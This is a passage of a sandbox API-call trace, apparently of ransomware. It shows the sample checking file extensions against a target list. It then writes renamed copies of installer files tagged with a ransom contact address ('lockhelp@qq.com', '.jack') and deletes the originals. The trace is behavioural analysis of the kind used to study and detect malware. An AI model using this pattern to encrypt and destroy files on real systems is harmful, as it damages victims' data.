(lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0196.980] lstrlenW (lpString=".jpg") returned 4 [0196.980] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0196.980] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0196.980] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0196.980] lstrlenW (lpString=".doc") returned 4 [0196.980] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0196.980] lstrlenW (lpString=".docx") returned 5 [0196.980] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0196.980] lstrlenW (lpString=".pdf") returned 4 [0196.980] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0196.980] lstrlenW (lpString=".xls") returned 4 [0196.980] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0196.980] lstrlenW (lpString=".xlsx") returned 5 [0196.980] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0196.980] lstrlenW (lpString=".ppt") returned 4 [0196.980] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0196.980] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0196.980] lstrlenW (lpString=".zip") returned 4 [0196.980] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0196.980] lstrlenW (lpString=".rar") returned 4 [0196.980] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0196.981] lstrlenW (lpString=".bz2") returned 4 [0196.981] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0196.981] lstrlenW (lpString=".7z") returned 3 [0196.981] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0196.981] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0196.981] lstrlenW (lpString=".dbf") returned 4 [0196.981] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0196.981] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0196.981] lstrlenW (lpString=".1cd") returned 4 [0196.981] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0196.981] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0196.981] lstrlenW (lpString=".jpg") returned 4 [0196.981] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0196.981] lstrcmpiW (lpString1=".rtf", lpString2=".jack") returned 1 [0196.981] lstrlenW (lpString="eula.rtf") returned 8 [0196.981] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0196.982] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=3702) returned 1 [0196.982] CloseHandle (hObject=0x3dc) returned 1 [0196.982] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf")) returned 0x80 [0196.982] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.982] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0196.982] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.982] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.982] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0196.983] GetLastError () returned 0x0 [0196.983] ReadFile (in: hFile=0x3dc, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0xe76, lpOverlapped=0x0) returned 1 [0197.004] WriteFile (in: hFile=0x410, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xe80, lpOverlapped=0x0) returned 1 [0197.005] ReadFile (in: hFile=0x3dc, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.005] WriteFile (in: hFile=0x410, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xe4, lpOverlapped=0x0) returned 1 [0197.005] SetEndOfFile (hFile=0x410) returned 1 [0197.005] CloseHandle (hObject=0x410) returned 1 [0197.009] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.009] SetEndOfFile (hFile=0x3dc) returned 1 [0197.010] CloseHandle (hObject=0x3dc) returned 1 [0197.010] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.011] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf")) returned 1 [0197.011] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0197.011] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0197.011] lstrlenW (lpString=".doc") returned 4 [0197.011] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.011] lstrlenW (lpString=".docx") returned 5 [0197.011] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.011] lstrlenW (lpString=".pdf") returned 4 [0197.011] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.011] lstrlenW (lpString=".xls") returned 4 [0197.011] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.011] lstrlenW (lpString=".xlsx") returned 5 [0197.011] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.011] lstrlenW (lpString=".ppt") returned 4 [0197.011] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.011] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0197.011] lstrlenW (lpString=".zip") returned 4 [0197.011] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.011] lstrlenW (lpString=".rar") returned 4 [0197.011] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.011] lstrlenW (lpString=".bz2") returned 4 [0197.011] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.012] lstrlenW (lpString=".7z") returned 3 [0197.012] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.012] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0197.012] lstrlenW (lpString=".dbf") returned 4 [0197.012] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.012] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0197.012] lstrlenW (lpString=".1cd") returned 4 [0197.012] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.012] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0197.012] lstrlenW (lpString=".jpg") returned 4 [0197.012] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.012] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0197.012] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0197.012] lstrlenW (lpString=".doc") returned 4 [0197.233] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.233] lstrlenW (lpString=".docx") returned 5 [0197.233] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.233] lstrlenW (lpString=".pdf") returned 4 [0197.233] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.331] lstrlenW (lpString=".xls") returned 4 [0197.331] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.331] lstrlenW (lpString=".xlsx") returned 5 [0197.331] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.331] lstrlenW (lpString=".ppt") returned 4 [0197.331] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.331] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0197.331] lstrlenW (lpString=".zip") returned 4 [0197.331] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.331] lstrlenW (lpString=".rar") returned 4 [0197.331] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.331] lstrlenW (lpString=".bz2") returned 4 [0197.331] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.331] lstrlenW (lpString=".7z") returned 3 [0197.331] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.331] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0197.331] lstrlenW (lpString=".dbf") returned 4 [0197.331] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.331] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0197.331] lstrlenW (lpString=".1cd") returned 4 [0197.331] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.331] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0197.331] lstrlenW (lpString=".jpg") returned 4 [0197.331] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.331] lstrcmpiW (lpString1=".rtf", lpString2=".jack") returned 1 [0197.332] lstrlenW (lpString="eula.rtf") returned 8 [0197.332] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x408 [0197.332] GetFileSizeEx (in: hFile=0x408, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=3643) returned 1 [0197.333] CloseHandle (hObject=0x408) returned 1 [0197.333] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf")) returned 0x80 [0197.333] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.333] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x408 [0197.333] SetFilePointerEx (in: hFile=0x408, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.333] SetFilePointerEx (in: hFile=0x408, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.333] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0197.333] GetLastError () returned 0x0 [0197.333] ReadFile (in: hFile=0x408, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0xe3b, lpOverlapped=0x0) returned 1 [0197.335] WriteFile (in: hFile=0x414, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xe40, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xe40, lpOverlapped=0x0) returned 1 [0197.336] ReadFile (in: hFile=0x408, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.336] WriteFile (in: hFile=0x414, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xe4, lpOverlapped=0x0) returned 1 [0197.336] SetEndOfFile (hFile=0x414) returned 1 [0197.337] CloseHandle (hObject=0x414) returned 1 [0197.337] SetFilePointerEx (in: hFile=0x408, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.337] SetEndOfFile (hFile=0x408) returned 1 [0197.338] CloseHandle (hObject=0x408) returned 1 [0197.338] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.339] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf")) returned 1 [0197.339] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0197.339] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0197.339] lstrlenW (lpString=".doc") returned 4 [0197.339] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.339] lstrlenW (lpString=".docx") returned 5 [0197.339] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.339] lstrlenW (lpString=".pdf") returned 4 [0197.339] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.339] lstrlenW (lpString=".xls") returned 4 [0197.339] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.339] lstrlenW (lpString=".xlsx") returned 5 [0197.339] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.339] lstrlenW (lpString=".ppt") returned 4 [0197.339] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.339] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0197.339] lstrlenW (lpString=".zip") returned 4 [0197.340] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.340] lstrlenW (lpString=".rar") returned 4 [0197.340] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.340] lstrlenW (lpString=".bz2") returned 4 [0197.340] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.340] lstrlenW (lpString=".7z") returned 3 [0197.340] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.340] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0197.340] lstrlenW (lpString=".dbf") returned 4 [0197.340] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.340] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0197.340] lstrlenW (lpString=".1cd") returned 4 [0197.340] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.340] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0197.340] lstrlenW (lpString=".jpg") returned 4 [0197.340] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.340] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0197.340] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0197.340] lstrlenW (lpString=".doc") returned 4 [0197.340] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0197.340] lstrlenW (lpString=".docx") returned 5 [0197.340] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0197.340] lstrlenW (lpString=".pdf") returned 4 [0197.340] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0197.340] lstrlenW (lpString=".xls") returned 4 [0197.341] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0197.341] lstrlenW (lpString=".xlsx") returned 5 [0197.341] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0197.341] lstrlenW (lpString=".ppt") returned 4 [0197.341] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0197.341] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0197.341] lstrlenW (lpString=".zip") returned 4 [0197.341] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0197.341] lstrlenW (lpString=".rar") returned 4 [0197.341] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0197.341] lstrlenW (lpString=".bz2") returned 4 [0197.341] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0197.341] lstrlenW (lpString=".7z") returned 3 [0197.341] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0197.341] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0197.341] lstrlenW (lpString=".dbf") returned 4 [0197.341] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0197.341] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0197.341] lstrlenW (lpString=".1cd") returned 4 [0197.341] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0197.341] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0197.341] lstrlenW (lpString=".jpg") returned 4 [0197.341] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0197.341] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0197.342] lstrlenW (lpString="LocalizedData.xml") returned 17 [0197.342] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x408 [0197.342] GetFileSizeEx (in: hFile=0x408, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=80060) returned 1 [0197.342] CloseHandle (hObject=0x408) returned 1 [0197.342] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml")) returned 0x80 [0197.342] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.342] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x408 [0197.342] SetFilePointerEx (in: hFile=0x408, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.342] SetFilePointerEx (in: hFile=0x408, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.342] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0197.343] GetLastError () returned 0x0 [0197.343] ReadFile (in: hFile=0x408, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x138bc, lpOverlapped=0x0) returned 1 [0197.441] WriteFile (in: hFile=0x414, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x138c0, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x138c0, lpOverlapped=0x0) returned 1 [0197.443] ReadFile (in: hFile=0x408, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.443] WriteFile (in: hFile=0x414, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xf6, lpOverlapped=0x0) returned 1 [0197.443] SetEndOfFile (hFile=0x414) returned 1 [0197.444] CloseHandle (hObject=0x414) returned 1 [0197.446] SetFilePointerEx (in: hFile=0x408, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.446] SetEndOfFile (hFile=0x408) returned 1 [0197.447] CloseHandle (hObject=0x408) returned 1 [0197.447] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.448] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml")) returned 1 [0197.448] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0197.448] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0197.448] lstrlenW (lpString=".doc") returned 4 [0197.448] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.448] lstrlenW (lpString=".docx") returned 5 [0197.448] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.448] lstrlenW (lpString=".pdf") returned 4 [0197.448] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.448] lstrlenW (lpString=".xls") returned 4 [0197.448] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.448] lstrlenW (lpString=".xlsx") returned 5 [0197.448] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.448] lstrlenW (lpString=".ppt") returned 4 [0197.448] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.449] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0197.449] lstrlenW (lpString=".zip") returned 4 [0197.449] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.449] lstrlenW (lpString=".rar") returned 4 [0197.449] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.449] lstrlenW (lpString=".bz2") returned 4 [0197.449] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.449] lstrlenW (lpString=".7z") returned 3 [0197.449] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.449] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0197.449] lstrlenW (lpString=".dbf") returned 4 [0197.449] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.449] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0197.449] lstrlenW (lpString=".1cd") returned 4 [0197.449] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.449] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0197.449] lstrlenW (lpString=".jpg") returned 4 [0197.449] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.449] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0197.449] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0197.449] lstrlenW (lpString=".doc") returned 4 [0197.449] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0197.449] lstrlenW (lpString=".docx") returned 5 [0197.449] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0197.449] lstrlenW (lpString=".pdf") returned 4 [0197.449] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0197.449] lstrlenW (lpString=".xls") returned 4 [0197.449] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0197.450] lstrlenW (lpString=".xlsx") returned 5 [0197.450] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0197.450] lstrlenW (lpString=".ppt") returned 4 [0197.450] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0197.450] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0197.450] lstrlenW (lpString=".zip") returned 4 [0197.450] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0197.450] lstrlenW (lpString=".rar") returned 4 [0197.450] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0197.450] lstrlenW (lpString=".bz2") returned 4 [0197.450] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0197.450] lstrlenW (lpString=".7z") returned 3 [0197.450] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0197.450] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0197.450] lstrlenW (lpString=".dbf") returned 4 [0197.450] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0197.450] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0197.450] lstrlenW (lpString=".1cd") returned 4 [0197.450] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0197.450] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0197.450] lstrlenW (lpString=".jpg") returned 4 [0197.450] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0197.451] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0197.451] lstrlenW (lpString="LocalizedData.xml") returned 17 [0197.451] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x408 [0197.451] GetFileSizeEx (in: hFile=0x408, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=68226) returned 1 [0197.451] 